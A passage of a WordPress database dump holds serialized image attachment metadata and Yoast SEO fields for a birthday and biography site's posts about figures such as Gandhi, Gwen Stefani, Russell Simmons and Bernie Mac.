\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:18:\"Ghandi-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:18:\"Ghandi-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:18:\"Ghandi-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:18:\"Ghandi-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:18:\"Ghandi-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:18:\"Ghandi-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:18:\"Ghandi-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:18:\"Ghandi-534x427.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:18:\"Ghandi-640x385.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:18:\"Ghandi-630x420.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1941,315,'_wp_attached_file','2015/10/Mahatma-Ghandi.jpg'),(1942,315,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:441;s:6:\"height\";i:599;s:4:\"file\";s:26:\"2015/10/Mahatma-Ghandi.jpg\";s:5:\"sizes\";a:17:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"Mahatma-Ghandi-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"Mahatma-Ghandi-221x300.jpg\";s:5:\"width\";i:221;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:24:\"Mahatma-Ghandi-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:25:\"Mahatma-Ghandi-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:26:\"Mahatma-Ghandi-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:26:\"Mahatma-Ghandi-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:26:\"Mahatma-Ghandi-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:26:\"Mahatma-Ghandi-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:26:\"Mahatma-Ghandi-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:26:\"Mahatma-Ghandi-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:26:\"Mahatma-Ghandi-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:26:\"Mahatma-Ghandi-441x261.jpg\";s:5:\"width\";i:441;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:26:\"Mahatma-Ghandi-441x462.jpg\";s:5:\"width\";i:441;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:26:\"Mahatma-Ghandi-441x385.jpg\";s:5:\"width\";i:441;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:26:\"Mahatma-Ghandi-441x486.jpg\";s:5:\"width\";i:441;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"td_1068x580\";a:4:{s:4:\"file\";s:26:\"Mahatma-Ghandi-441x580.jpg\";s:5:\"width\";i:441;s:6:\"height\";i:580;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:26:\"Mahatma-Ghandi-309x420.jpg\";s:5:\"width\";i:309;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1943,313,'_thumbnail_id','314'),(1945,313,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(1946,313,'slide_template','default'),(1947,313,'_yoast_wpseo_metadesc','Ghandi is the former leader of India\'s independence movement. Learn how he rose from his humble beginnings to a leader of peace and non-violence. Continuing to inspire even today.'),(1948,313,'post_views_count','254'),(1953,313,'_yoast_wpseo_focuskw','Ghandi'),(1954,313,'_yoast_wpseo_title','Ghandi (1869 - 1948)'),(1955,313,'_yoast_wpseo_linkdex','87'),(1963,320,'_wp_attached_file','2015/10/Gwen-Stefani.jpg'),(1964,320,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:480;s:4:\"file\";s:24:\"2015/10/Gwen-Stefani.jpg\";s:5:\"sizes\";a:15:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Gwen-Stefani-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Gwen-Stefani-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:22:\"Gwen-Stefani-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:23:\"Gwen-Stefani-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:24:\"Gwen-Stefani-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:24:\"Gwen-Stefani-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:24:\"Gwen-Stefani-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:24:\"Gwen-Stefani-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:24:\"Gwen-Stefani-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:24:\"Gwen-Stefani-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:24:\"Gwen-Stefani-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:24:\"Gwen-Stefani-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:24:\"Gwen-Stefani-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:24:\"Gwen-Stefani-640x385.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:24:\"Gwen-Stefani-560x420.jpg\";s:5:\"width\";i:560;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1965,321,'_wp_attached_file','2015/10/Gwen.jpg'),(1966,321,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:480;s:6:\"height\";i:640;s:4:\"file\";s:16:\"2015/10/Gwen.jpg\";s:5:\"sizes\";a:17:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"Gwen-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"Gwen-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:14:\"Gwen-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:15:\"Gwen-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:16:\"Gwen-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:16:\"Gwen-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:16:\"Gwen-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:16:\"Gwen-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:16:\"Gwen-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:16:\"Gwen-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:16:\"Gwen-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:16:\"Gwen-480x261.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:16:\"Gwen-480x462.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:16:\"Gwen-480x385.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:16:\"Gwen-480x486.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"td_1068x580\";a:4:{s:4:\"file\";s:16:\"Gwen-480x580.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:580;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:16:\"Gwen-315x420.jpg\";s:5:\"width\";i:315;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1975,323,'_edit_lock','1444408058:6'),(1976,323,'_edit_last','6'),(1977,323,'post_views_count','219'),(1978,324,'_wp_attached_file','2015/10/Russell-Simmons.jpg'),(1979,324,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:426;s:4:\"file\";s:27:\"2015/10/Russell-Simmons.jpg\";s:5:\"sizes\";a:15:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"Russell-Simmons-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"Russell-Simmons-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:25:\"Russell-Simmons-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:26:\"Russell-Simmons-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:27:\"Russell-Simmons-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:27:\"Russell-Simmons-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:27:\"Russell-Simmons-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:27:\"Russell-Simmons-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:27:\"Russell-Simmons-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:27:\"Russell-Simmons-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:27:\"Russell-Simmons-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:27:\"Russell-Simmons-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:27:\"Russell-Simmons-534x426.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:426;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:27:\"Russell-Simmons-640x385.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:27:\"Russell-Simmons-631x420.jpg\";s:5:\"width\";i:631;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1980,323,'_thumbnail_id','324'),(1981,323,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(1982,323,'slide_template',''),(1983,323,'_yoast_wpseo_focuskw','Russell Simmons'),(1984,323,'_yoast_wpseo_title','Russell Simmons Birthday'),(1985,323,'_yoast_wpseo_metadesc','Russell Simmons is seen as the leader when it comes to the cultural revolution of hip hop. He shaped an industry using business and ambition.'),(1986,323,'_yoast_wpseo_linkdex','91'),(1989,325,'_edit_lock','1444328499:6'),(1991,325,'_edit_last','6'),(1992,325,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(1993,325,'slide_template','default'),(1994,325,'_yoast_wpseo_focuskw','Gwen Stefani'),(1995,325,'_yoast_wpseo_title','Gwen Stefani\'s Birthday'),(1996,325,'_yoast_wpseo_metadesc','Gwen Stefani is a highly skilled actress, singer, songwriter, and fashion designer. She\'s accomplished quite a bit in her career.'),(1997,325,'_yoast_wpseo_linkdex','96'),(1998,325,'post_views_count','228'),(1999,326,'_wp_attached_file','2015/10/Russell_Simmons.jpg'),(2000,326,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:1200;s:4:\"file\";s:27:\"2015/10/Russell_Simmons.jpg\";s:5:\"sizes\";a:20:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"Russell_Simmons-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"Russell_Simmons-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"Russell_Simmons-768x1152.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:28:\"Russell_Simmons-683x1024.jpg\";s:5:\"width\";i:683;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:25:\"Russell_Simmons-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:26:\"Russell_Simmons-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:27:\"Russell_Simmons-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:27:\"Russell_Simmons-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:27:\"Russell_Simmons-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:27:\"Russell_Simmons-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:27:\"Russell_Simmons-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:27:\"Russell_Simmons-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:27:\"Russell_Simmons-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:27:\"Russell_Simmons-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:27:\"Russell_Simmons-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_696x0\";a:4:{s:4:\"file\";s:28:\"Russell_Simmons-696x1044.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:1044;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:27:\"Russell_Simmons-696x385.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:27:\"Russell_Simmons-741x486.jpg\";s:5:\"width\";i:741;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"td_1068x580\";a:4:{s:4:\"file\";s:27:\"Russell_Simmons-800x580.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:580;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:27:\"Russell_Simmons-280x420.jpg\";s:5:\"width\";i:280;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2001,327,'_edit_lock','1444832163:6'),(2002,327,'_edit_last','6'),(2003,328,'_edit_lock','1444326597:6'),(2004,329,'_wp_attached_file','2015/10/Bernie-Mac.jpg'),(2005,329,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:550;s:6:\"height\";i:599;s:4:\"file\";s:22:\"2015/10/Bernie-Mac.jpg\";s:5:\"sizes\";a:17:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Bernie-Mac-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Bernie-Mac-275x300.jpg\";s:5:\"width\";i:275;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:20:\"Bernie-Mac-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:21:\"Bernie-Mac-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:22:\"Bernie-Mac-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:22:\"Bernie-Mac-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:22:\"Bernie-Mac-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:22:\"Bernie-Mac-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:22:\"Bernie-Mac-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:22:\"Bernie-Mac-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:22:\"Bernie-Mac-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:22:\"Bernie-Mac-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:22:\"Bernie-Mac-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:22:\"Bernie-Mac-550x385.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:22:\"Bernie-Mac-550x486.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"td_1068x580\";a:4:{s:4:\"file\";s:22:\"Bernie-Mac-550x580.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:580;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:22:\"Bernie-Mac-386x420.jpg\";s:5:\"width\";i:386;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s